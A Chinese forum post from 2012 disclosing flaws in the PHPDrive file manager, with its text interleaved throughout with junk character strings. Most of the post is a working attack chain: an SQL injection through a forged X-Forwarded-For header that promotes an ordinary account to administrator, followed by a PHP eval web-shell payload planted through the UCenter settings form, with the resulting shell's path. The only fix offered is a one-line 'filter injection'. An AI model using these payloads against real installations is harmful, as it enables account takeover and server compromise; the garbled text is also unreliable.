PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等% M( x0 I: e: T! J( \" p9 ^5 ]0 i
( T" O# M/ ?( q. L' t; V( Cincludes/user.lib.php
* e2 m; ^; N5 E/ ~+ {/ E行87
) U# J' W% |" B) }: d! T# Q6 P function get_ip() {
$ X4 i1 t5 P& O) F; I if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.( W* x9 J$ E; {
在用户注册与登录 处module/disk/account.lead.php
1 Y( ]/ Q+ k- b198行 ) C" m }* O. Z5 S7 ?* ^3 x9 }
//更新本次登录IP和时间) N9 D/ F5 \& S# |. d
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生5 K C& ~" M8 Q7 f6 Y& |
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限# i/ N: [9 E* _1 T* ^
实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
4 k) S0 W0 |4 u- T: I/ ~. Z后台getshell:! O: Q6 C4 ?+ P8 {3 D
在UCenter设置处,将UC数据库登录名填写为' f. k8 a" t6 V
( F. {: ^# C9 {root’);eval($_POST[DisKill]);?>/*2 I/ E8 s6 p, { S
可以得到一个shell,位置在 data/uc.data.php
+ Q! l! s4 Q2 d9 B4 ~. }
+ G: ^( t: U' J6 X9 D) J% ^修复:过滤注入4 I* l; ~# n: J, ^$ _
" b9 e# k" }2 N$ Z
|
发表于 2012-12-31 09:18:34
收藏
支持
反对